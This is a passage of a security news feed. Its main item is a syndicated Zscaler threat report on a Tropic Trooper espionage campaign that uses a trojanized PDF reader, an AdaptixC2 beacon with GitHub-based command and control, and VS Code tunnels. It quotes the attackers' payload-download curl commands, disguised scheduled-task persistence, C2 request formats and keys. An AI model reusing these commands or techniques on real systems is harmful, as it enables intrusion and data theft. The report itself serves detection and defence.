announcement, isolated the relevant code, and ran them through small, cheap, open-weights models. Those models recovered much of the same analysis.”</p><p>The models included GPT-OSS-120b, DeepSeek R1, Qwen3, and Gemma 4. The results varied depending on the model and the task, they wrote.</p><h3>The Real Story</h3><p>Researchers with Vidoc Security Lab, another AI-based cybersecurity startup, <a href="https://blog.vidocsecurity.com/blog/we-reproduced-anthropics-mythos-findings-with-public-models" target="_blank" rel="noopener">wrote</a> that they came up with similar results with OpenAI’s GPT-5.4 and Anthropic’s Claude Opus 4.6 models running OpenCode, an open source AI coding agent, scanning for security flaws in open software like OpenBSD and FFmpeg.</p><p>“If public models can already do useful work inside that kind of workflow, then the story is not ‘Anthropic has a magical cyber artifact,’” they wrote. “The story is that serious AI-assisted vulnerability research is no longer confined to a single frontier lab. That does not make the workflow easy. It means the moat is moving up the stack, from model access to validation, prioritization, and remediation.”</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/unauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model/" data-a2a-title="Unauthorized Users Reportedly Gain Access to Anthropic’s Mythos AI Model"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Funauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model%2F&amp;linkname=Unauthorized%20Users%20Reportedly%20Gain%20Access%20to%20Anthropic%E2%80%99s%20Mythos%20AI%20Model" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Funauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model%2F&amp;linkname=Unauthorized%20Users%20Reportedly%20Gain%20Access%20to%20Anthropic%E2%80%99s%20Mythos%20AI%20Model" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Funauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model%2F&amp;linkname=Unauthorized%20Users%20Reportedly%20Gain%20Access%20to%20Anthropic%E2%80%99s%20Mythos%20AI%20Model" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Funauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model%2F&amp;linkname=Unauthorized%20Users%20Reportedly%20Gain%20Access%20to%20Anthropic%E2%80%99s%20Mythos%20AI%20Model" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Funauthorized-users-reportedly-gain-access-to-anthropics-mythos-ai-model%2F&amp;linkname=Unauthorized%20Users%20Reportedly%20Gain%20Access%20to%20Anthropic%E2%80%99s%20Mythos%20AI%20Model" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>The post <a href="https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener">Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener</a> appeared first on <a href="https://www.zscaler.com/blogs/feeds/security-research">Security Research | Blog</a>.</p><p>IntroductionOn March 12, 2026, Zscaler ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals. Our analysis of this sample uncovered a campaign leveraging a multi-stage attack chain where a trojanized SumatraPDF reader deploys an AdaptixC2 Beacon agent, ultimately leading to the download and abuse of Visual Studio (VS) Code tunnels for remote access. During our analysis, we observed that the threat actor likely targeted Chinese-speaking individuals in Taiwan, and individuals in South Korea and Japan. Based on the tactics, techniques, and procedures (TTPs) observed in this attack, ThreatLabz attributes this activity to Tropic Trooper (also known as Earth Centaur and Pirate Panda) with high confidence.In this blog post, ThreatLabz covers the Tropic Trooper campaign and the tools that were deployed to conduct intelligence gathering. Key TakeawaysOn March 12, 2026, ThreatLabz discovered a malicious ZIP archive containing military-themed document lures targeting Chinese-speaking individuals.The campaign used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.The shellcode loader used in this attack closely resembles the TOSHIS loader, which has been associated with Tropic Trooper and was previously reported in the TAOTH campaign.The threat actors created a custom AdaptixC2 Beacon listener, leveraging GitHub as their command-and-control (C2) platform.The staging server involved in this attack also hosted CobaltStrike Beacon and an EntryShell backdoor. Both malware types and configurations are known to have been used by Tropic Trooper. Technical AnalysisIn the sections below, ThreatLabz outlines the attack chain, starting with military-themed lures and leading to the deployment of the AdaptixC2 Beacon agent. We also discuss the use of a custom GitHub listener and the recurring TTP of abusing VS Code for remote access.Attack chainThe full sequence of the attack is illustrated in the figure below.Figure 1: Tropic Trooper attack chain leading to the deployment of an AdaptixC2 Beacon and VS Code tunnels.The ZIP archive contained documents with the following names roughly translated to English:Original Chinese FilenameEnglish TranslationCECC昆山元宇宙产业基地建设方案(20230325).docxCECC Kunshan Metaverse Industrial Base Construction Plan (20230325).docx中国声学智能产业声创中心建设和运营方案(2021112)(2)(1)(1).docxChina Acoustic Intelligence Industry Innovation Center Construction and Operation Plan (2021112)(2)(1)(1).docx武器装备体系结构贡献度评估.pdfAssessment of Contribution Degree of Weaponry System Architecture.pdf武器装备体系能力贡献度的解析与度量方法.pdfAnalysis and Measurement Methods for Capability Contribution of Weaponry Systems.pdf江苏自主智能无人系统产业基地建设方案(202304) .docxJiangsu Autonomous Intelligent Unmanned Systems Industrial Base Construction Plan (202304).docx美英与美澳核潜艇合作的比较分析(2025).exeComparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exeTable 1: The table lists the files found inside the ZIP archive, showing each original Chinese filename alongside its approximate English translation.Most of these files appear outdated. The document that appears to be the most recent, Comparative Analysis of US-UK and US-Australia Nuclear Submarine Cooperation (2025).exe, is actually a trojanized version of the SumatraPDF reader binary. When executed, this loader triggers a multi-stage attack: it downloads and displays a new decoy PDF that is shown to the victim while discreetly downloading and running an AdaptixC2 Beacon agent in the background.The downloaded lure PDF aligns with its file name, featuring analysis and visuals concerning American submarines and the AUKUS partnership (a security partnership between Australia, the U.K., and the U.S). The figure below illustrates the contents of the downloaded lure PDF.Figure 2: Tropic Trooper PDF lure containing information about the AUKUS partnership and American submarines.Stage 1 – TOSHIS loader (backdoored SumatraPDF)The trojanized executable resembles the open-source SumatraPDF reader at first glance, featuring identical certificates and PDB paths to those of the legitimate SumatraPDF executable. However, the signature of this binary is invalid because it has been trojanized with TOSHIS loader. Analysis shows the threat actor hijacks the executable’s control flow by redirecting the _security_init_cookie function to execute malicious code. Compared to earlier TOSHIS loader samples, where the entry point was modified to jump to the payload, this version uses a revised trojanization method that executes by overwriting _security_init_cookie instead.Figure 3: Comparison of the entry points in the trojanized and legitimate SumatraPDF versions.The InjectedCode function redirects to TOSHIS loader code. The function begins by constructing stack strings, which include the command-and-control (C2) IP address, the destination path for the lure file, DLL names, and a cryptographic key. Next, TOSHIS loader resolves various APIs using the Adler-32 hash algorithm. Subsequently, TOSHIS loader downloads the PDF decoy from 58.247.193[.]100 and opens it using ShellExecuteW. TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory. This shellcode is an AdaptixC2 Beacon agent. This marks a departure from earlier TOSHIS versions, which delivered either a Cobalt Strike Beacon or a Merlin Mythic agentANALYST NOTE: The AES key is derived by using the Windows API function CryptDeriveKey with the MD5 hash of a hard-coded key seed “424986c3a4fddcb6”. The initialization vector (IV) is set to 0.An analysis of the InjectedCode function shows that it is largely identical to the TOSHIS loader described in TrendMicro’s TAOTH report. The only notable differences are modifications to the stack strings and the removal of the language ID check. Although this sample resolves the GetSystemDefaultLangID API, the API is never actually invoked. Clear similarities can be observed between the injected code in these two samples, such as the use of the same User-Agent and a similar .dat file extension, as shown in the code examples below.Figure 4: Code comparison of the TOSHIS loader in the backdoored SumatraPDF sample and the TOSHIS loader described in the TAOTH report.Stage 2 – Backdoor: AdaptixC2 Beacon agent integrated with GitHubThe second-stage backdoor employed in this attack is the open-source AdaptixC2 Beacon agent, which incorporates a customized Beacon Listener. The table below shows the extracted configuration:OffsetFieldValueConfig Meta0x00Extra field0x6a (106)0x04Profile size156 bytes (encrypted)Decrypted Profile0x08Agent type (wmark)0xbe4c0149GitHub Transport Config0x0CRepo ownercvaS23uchsahs0x1ERepo namerss0x26API hostapi.github.com0x39Auth tokenghp_…0x66Issues API pathrepos/cvaS23uchsahs/rss/issues?state=openTiming Config0x94Kill datedisabled0x98Working timedisabled (always active)0x9CSleep delay60 seconds0xA0Jitter42RC4 Key0xA4RC4 key7adf76418856966effc9ccf8a21d1b12Table 2: Configuration extracted  from a Tropic Trooper AdaptixC2 Beacon agent.The RC4 key in the config above is used to decrypt the encrypted parts of the config, as well as beacon heartbeats. Because the agent is open-source, our focus will be on the custom beacon listener component, which utilizes GitHub as its C2 server. The figure below shows the layout of the GitHub repository used for C2.Figure 5: Layout of the Tropic Trooper GitHub repository used by an AdaptixC2 Beacon.The figure below shows the details of GitHub issues used for C2.Figure 6: Example of GitHub issues used by AdaptixC2.The agent starts by generating a 16-bytes RC4 session key using RtlRandomEx(GetTickCount()) to encrypt all subsequent C2 traffic, which is a standard practice for an AdaptixC2 agent. However, this custom listener differs from the typical AdaptixC2 HTTP/TCP listeners because the server cannot identify the agent’s external IP address since it is using GitHub. As a result, the agent retrieves its external IP address by sending a request to ipinfo.io. This external IP address is then included and sent back to the C2 with every beacon. The agent uses the following HTTP request to retrieve its external IP address from ipinfo.io.GET /ip HTTP/1.1</p><p>User-Agent: curl/8.5.0 // Hardcoded user agent<br> Host: ipinfo.io<br> Cache-Control: no-cacheThe agent then sends a beacon to the C2 by performing a POST request to GitHub Issue #1 to establish a session. The beacon follows the standard AdaptixC2 format, which contains the RC4 session key and a random 4-byte number used as an agent ID. These values are RC4 encrypted using the key in the agent’s config, Note that the agent ID is regenerated each time the agent is initialized. The agent uses this ID to identify and process commands specifically intended for it. The following figure shows the C2 workflow:Figure 7: Diagram showing the C2 workflow.After beaconing, the agent checks for tasks to be executed by making the following request:GET /repos/cvaS23uchsahs/rss/issues?state=open HTTP/1.1The API returns a JSON list of open issues, and the agent uses substring matching, rather than a full JSON parser, to extract the issue number, title, and body fields for each issue retrieved. Depending on the issue title, the agent uses varying logic to process the issue and extract the actual task, which is RC4 encrypted using the session key.The agent processes the issue as follows:If the title is “beat”: This is the heartbeat/beacon issue, and the agent skips it.If the title starts with “upload” and ends with “.txt”: The agent finds the last “_” character in the title, expecting an 8-character hexadecimal agent ID embedded between the “_” character and the “.txt” extension. If this extracted ID matches the agent’s own ID, the agent continues on to process this issue. If the extracted ID does not match, the agent skips the issue. However, there are some unusual edge-cases. For example, the agent will process an issue if there is no “_” character in the title, or if there are less than 7 characters in the extracted ID.If the agent decides to process the issue, it constructs the contents API URL. For example: /repos/{repo_owner}/{repo_name}/contents/upload/{agent_id}/{issue_title} or /repos/cvaS23uchsahs/rss/contents/upload/c64df0d5/upload_1773341382_c64df0d5.txt.The agent then retrieves the download URL from the response using substring matching again.The agent then downloads the file from the repository, decodes its Base64-encoded contents, and queues the task for processing.If the title starts with “fileupload”: The agent extracts and Base64 decodes the “body” field, and queues the task for processing. This encrypted task  contains the file path that the agent should exfiltrate. Note that there is no agent ID check here, so all agents will attempt to execute this task.If the title does not start with any of the 3 strings above: The agent decodes the Base64 title and queues it as a command for processing. Again, there is no agent ID check here, so all agents attempt to execute this task. The agent then proceeds to process all queued tasks. Each task in the queue is decrypted using the RC4 session key, and processed according to the standard AdaptixC2 agent procedure.After processing the task, the agent prepares a response payload. The response consists of two parts: the encrypted beacon packet sent previously (RC4 encrypted with the key from the agent’s config), and the AdaptixC2 agent data packet encrypted with the session key. The entire buffer is Base64-encoded, and the agent uploads the buffer as a file to GitHub. If the buffer is larger than 30MB, it is uploaded in chunks of 30MB, with each 30MB chunk having an incremental part number. An example of an upload request is shown below.PUT /repos/cvaS23uchsahs/rss/contents/download/fa302eb5/download_1773890673_part1.txt HTTP/1.1</p><p>// …</p><p>Body: {“message”:”upload”,”content”:”&lt;base64 blob&gt;”}Once the file is successfully uploaded, the agent adds a comment to the issue containing the command to which it is responding.The “|@@@|” string is used as a token to separate multiple file parts, as shown below.POST /repos/cvaS23uchsahs/rss/issues/2/comments HTTP/1.1</p><p>// …</p><p>Body: {“body”:”fa302eb5|@@@|download_1773890673_part1.txt”}Stage 3 – Operations and operational securityBy monitoring the C2 communication flow through the GitHub repository, ThreatLabz noticed that beacons are deleted very quickly, often within 10 seconds of being uploaded. This rapid deletion is likely intended to destroy the session keys, preventing observers from decrypting the C2 messages.During our observation of this campaign, ThreatLabz found that the threat actor primarily used the Adaptix agent as an initial foothold for reconnaissance and access. When a victim was deemed “interesting,” the threat actor deployed VS Code and utilized VS Code tunnels for remote access. On some machines, the threat actor installed alternative, trojanized applications, possibly to better camouflage their activities among the applications the victim normally uses.ThreatLabz observed the threat actor issuing the following commands:arp /acd C:\Users\Public\Documents &amp; code tunnel user login –provider github &gt; z.txtcode tunnel user login –provider github &gt; z.txtcurl -O http://bashupload[.]app/6e1lhccurl -kJL https://code.visualstudio.com/sha/download?build=stable&amp;os=cli-win32-x64 -o %localappdata%\microsoft\windows\Burn\v.zipcurl -s ‘ip.me?t=1&amp;m=2’curl http://bashupload[.]app/zgel2a.bin -o v.zip &amp; dircurl ip.me?t=1&amp;m=2net view \\192.168.220.2schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHESTschtasks /create /tn \MicrosoftUDN /sc hourly /mo 2 /f /tr C:\Users\Public\Documents\MicrosoftCompilers.exe C:\Users\Public\Documents\2.library-mstasklist | findstr /i notetasklist|findstr /i code.exe || code tunnel user login –provider github &gt; z2.txttimeout 3 &amp;&amp; schtasks /run /i /tn \MicrosoftUDNwmic process where processid=8528 get commandlineFurther monitoring of the staging server, 158.247.193[.]100, revealed that it also hosted the EntryShell backdoor, a custom backdoor known to be used by Tropic Trooper. This sample of EntryShell used the same AES-128 ECB key (afkngaikfaf) as previously reported. Additionally, the staging server was also found to host the Cobalt Strike Beacon, marked with the watermark “520”, another known indicator of Tropic Trooper activity. Threat AttributionThreatLabz attributes this attack to Tropic Trooper with high confidence based on the following factors:Use of TOSHIS: The loader used in this campaign matches the loader identified as TOSHIS in the TAOTH campaign.Trojanized binaries: The technique of using trojanized binaries (such as SumatraPDF) as part of the initial infection vector is consistent across both attacks. Specifically, a trojanized SunloginDesktopAgent.exe was observed in this campaign as part of a secondary infection.Publicly available backdoors: Similar to the TAOTH campaign, publicly available backdoors are used as payloads. While Cobalt Strike Beacon and Mythic Merlin were previously used, the threat actor has now shifted to AdaptixC2.Use of VSCode: In both campaigns, the threat actor deployed VS Code to establish a tunnel.Post-infection commands: The commands executed in this attack are similar to those reported in the TAOTH campaign, particularly the use of “z.txt” when creating a VS Code tunnel.Hosting of EntryShell backdoor: The EntryShell backdoor, a custom backdoor previously linked to Tropic Trooper, was also used.CobaltStrike Beacon: The Cobalt Strike beacon with the watermark “520” is a known signature of Tropic Trooper. Additionally, it utilized C2 URIs such as “/Originate/contacts/CX4YJ5JI7RZ,” which were also observed in earlier attacks attributed to Tropic Trooper. ConclusionThis campaign, attributed to Tropic Trooper, targeted Chinese-speaking individuals in Taiwan, and individuals in South Korea and Japan. ThreatLabz was able to make this attribution with high confidence based on the threat actor’s use of the TOSHIS loader and similar TTPs. For this campaign, the Tropic Trooper deployed an AdaptixC2 Beacon agent, which utilized a custom GitHub-based C2 listener to deploy VS Code tunnels for remote access. Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to TOSHIS at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for TOSHIS.Figure 8: Zscaler Cloud Sandbox report for TOSHIS loader.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:Win64.Trojan.TOSHISWin32.Backdoor.AdaptixC2Win32.Backdoor.EntryShellWin32.Backdoor.CobaltStrike Indicators Of Compromise (IOCs)File indicatorsHashesFilenameDescription3238d2f6b9ea9825eb61ae5e80e7365c2c65433696037f4ce0f8c9a1d78bdd6835c1b94da4f2131eb497afe5f78d8d6e534df2b8d75c5b9b565c3ec17a323afe5355da26 UnknownZIP archive containing lures and trojanized SumatraPDF67fcf5c21474d314aa0b27b0ce8befb219e3c4df728e3e657cb9496cd4aaf69648470b6347c7ce0e3816647b23bb180725c7233e505f61c35e7776d47fd448009e887857 资料/美英与美澳核潜艇合作的比较分析(2025).exeTrojanized SumatraPDF89daa54fada8798c5f4e21738c8ea0b4bd618c9e1e10891fe666839650fa406833d70afdaeec65bac035789073b567753284b64ce0b95bbae62cf79e1479714238af0eb74d.datEncrypted reflective loader shellcode and AdaptixC2 Beacon agente2dc48ef24da000b8fc1354fa31ca9ae6c68dc2e33780e07596c3c06aa819ea460b3d1257a95ce0b5f201d9880a6844a1db69aac7d1a0bf1c88f85989264caf6c82c6001N/ADecrypted AdaptixC2 Beacon agent DLL2d7cc3646c287d6355def362916c6d26adb47733c224fc8c0f7edc61becb578e560435ab3936f522f187f8f67dda3dc88abfd170f6ba873af81fc31bbf1fdbcad1b2a7fb1C.datEncrypted Cobalt Strike Beacon loader71fa755b6ba012e1713c9101c7329f8dc2051635ccfdc0b48c260e7ceeee3f96bf026fea6eaea92394e115cd6d5bab9ae1c6d088806229aae320e6c519c2d2210dbc94fe2C.datEncrypted Cobalt Strike Beacon loaderc620b4671a5715eec0e9f3b93e6532ba343be0f2077901ea5b5b9fb97d97892ac1a907e6b92a3a1cf5786b6e08643483387b77640cd44f84df1169dd00efde7af46b5714N/ADecrypted Cobalt Strike Beacon loader9a69b717ec4e8a35ae595aa6762d3c27401cc16d79d94c32da3f66df21d66ffd71603c143c29c72a59133dd9eb23953211129fd8275a11b91a3b8dddb3c6e502b6b63edbN/ADecrypted Cobalt Strike Beacon loaderNetwork indicatorsTypeIndicatorIP Address158.247.193[.]100URLhttps://api.github.com/repos/cvaS23uchsahs/rss/issuesURLhttps://47.76.236[.]58:4430/Originate/contacts/CX4YJ5JI7RZURLhttps://47.76.236[.]58:4430/Divide/developement/GIZWQVCLFURLhttps://stg.lsmartv[.]com:8443/Originate/contacts/CX4YJ5JI7RZURLhttps://stg.lsmartv[.]com:8443/Divide/developement/GIZWQVCLF  MITRE ATT&amp;CK FrameworkIDTactic, TechniqueDescriptionT1585.003Resource Development: Establish Accounts: Cloud AccountsThe threat actor created the GitHub account cvaS23uchsahs, which hosted the RSS registry used for C2 communication.T1587.001Resource Development: Develop Capabilities: MalwareThe threat actor developed a custom listener for the AdaptixC2 Beacon agent that utilized the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.T1588.001Resource Development: Obtain Capabilities: MalwareThe threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.T1588.002Resource Development: Obtain Capabilities: ToolThe threat actor used VS Code’s tunnel feature for remote access to compromised systems.T1608.001Resource Development: Stage Capabilities: Upload MalwareThe threat actor hosted a second-stage shellcode payload on their server at 58.247.193[.]100 which the initial loader was designed to download and execute.T1608.002Resource Development: Stage Capabilities: Upload ToolThe threat actor uploaded VS Code to bashupload[.]app which was subsequently downloaded onto the victim machines.T1204.002Execution: User Execution: Malicious FileThe attack sequence requires a user to run the  malicious file titled “美英与美澳核潜艇合作的比较分析(2025).exe”.  T1106Execution: Native APIThe initial loader utilized WinCrypt cryptographic functions to decrypt a second-stage shellcode. Additionally, it employed the ShellExecuteW API to launch a decoy PDF document.T1059.003Execution: Command and Scripting Interpreter: Windows Command ShellThe threat actor utilized the Windows Command Shell to run several commands for reconnaissance purposes (e.g., arp, net view, tasklist) and to use cURL for downloading VS Code.T1053.005Persistence: Scheduled Task/Job: Scheduled TaskThe threat actor created a scheduled task using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.T1036.001Defense Evasion: Masquerading: Invalid Code SignatureThe threat actor used a trojanized SumatraPDF executable that includes the original SumatraPDF signature, although the signature is no longer valid.T1036.004Defense Evasion: Masquerading: Masquerade Task or ServiceThe threat actor created scheduled tasks with names intended to blend in with legitimate system tasks such as \\MSDNSvc and \\MicrosoftUDN.T1620Defense Evasion: Reflective Code LoadingThe trojanized SumatraPDF loader downloaded a second-stage shellcode from the C2 IP 58.247.193[.]100 which reflectively loads the AdaptixC2 Beacon agent.T1027.007Defense Evasion: Obfuscated Files or Information: Dynamic API ResolutionThe initial loader identified Windows APIs by comparing Adler-32 hashes of their names.T1027.013Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded FileThe initial loader downloaded a second-stage payload and decrypted the shellcode in-memory using AES-128.T1127Defense Evasion: Trusted Developer Utilities Proxy ExecutionThe threat actor downloaded Roslyn, an open-source .NET compiler, to compile and execute malicious code.T1016Discovery: System Network Configuration DiscoveryThe threat actor ran the command arp /a to retrieve the local ARP table. The threat actor sent requests to ipinfo.io to identify the external IP address of compromised machines.T1005Collection: Data from Local SystemThe threat actor used AdaptixC2 Beacon agent’s fileupload feature to exfiltrate files from infected machines.T1071.001Command and Control: Application Layer Protocol: Web ProtocolsThe TOSHIS loader downloaded a decoy PDF and a second-stage shellcode payload over HTTP from the IP address 58.247.193[.]100.The AdaptixC2 Beacon agent used HTTP/S to communicate with its GitHub C2.T1102.002Command and Control: Web Service: Bidirectional CommunicationThe threat actor used GitHub for bidirectional C2 communication.T1219.001Command and Control: Remote Access Tools: IDE TunnelingThe threat actor deployed VS Code and used its remote tunneling feature for interactive access.T1105Command and Control: Ingress Tool TransferThe threat actor utilized the cURL command to retrieve tools from external servers onto the compromised system. These included a VS Code binary from https://code.visualstudio.com and additional payloads from http://bashupload[.]app.T1132.001Command and Control: Data Encoding: Standard EncodingThe threat actor used Base64 and RC4 to obscure C2 communications.T1573.001Command and Control: Encrypted Channel: Symmetric CryptographyThe AdaptixC2 beacon agent encrypted its C2 traffic using an RC4 session key.T1573.002Command and Control: Encrypted Channel: Asymmetric CryptographyThe threat actor used the GitHub API for C2, which communicates over HTTPS.T1001.003Exfiltration: Exfiltration Over Web Service: Exfiltration to Code RepositoryThe threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.T1041Exfiltration: Exfiltration Over C2 ChannelThe threat actor exfiltrated data over the same channel used for C2 communication.  </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/tropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener/" data-a2a-title="Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Ftropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener%2F&amp;linkname=Tropic%20Trooper%20Pivots%20to%20AdaptixC2%20and%20Custom%20Beacon%20Listener" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Ftropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener%2F&amp;linkname=Tropic%20Trooper%20Pivots%20to%20AdaptixC2%20and%20Custom%20Beacon%20Listener" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Ftropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener%2F&amp;linkname=Tropic%20Trooper%20Pivots%20to%20AdaptixC2%20and%20Custom%20Beacon%20Listener" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Ftropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener%2F&amp;linkname=Tropic%20Trooper%20Pivots%20to%20AdaptixC2%20and%20Custom%20Beacon%20Listener" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Ftropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener%2F&amp;linkname=Tropic%20Trooper%20Pivots%20to%20AdaptixC2%20and%20Custom%20Beacon%20Listener" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.zscaler.com/blogs/feeds/security-research">Security Research | Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Yin Hong Chang (Zscaler)">Yin Hong Chang (Zscaler)</a>. Read the original post at: <a href="https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener">https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener</a> </p>

<p>The post <a href="https://xkcd.com/3219/">Randall Munroe’s XKCD 'Planets and Bright Stars'</a> appeared first on <a href="https://www.infosecurity.us/">Infosecurity.US</a>.</p><figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://randall%20munroe%E2%80%99s%20xkcd%20'planets%20and%20bright%20stars'/"></a></p> <p> <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png" data-image-dimensions="374x265" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=1000w" width="374" height="265" sizes="auto, (max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs"></p> <p> <figcaption class="image-caption-wrapper"> <p data-rte-preserve-empty="true"><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p> </figcaption></p></figure><p><a href="https://www.infosecurity.us/blog/2026/4/22/randall-munroes-xkcd-planets-and-bright-stars-1">Permalink</a></p><p> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/randall-munroes-xkcd-planets-and-bright-stars-2/" data-a2a-title="Randall Munroe’s XKCD ‘Planets and Bright Stars’"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Frandall-munroes-xkcd-planets-and-bright-stars-2%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Planets%20and%20Bright%20Stars%E2%80%99" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Frandall-munroes-xkcd-planets-and-bright-stars-2%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Planets%20and%20Bright%20Stars%E2%80%99" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Frandall-munroes-xkcd-planets-and-bright-stars-2%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Planets%20and%20Bright%20Stars%E2%80%99" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" 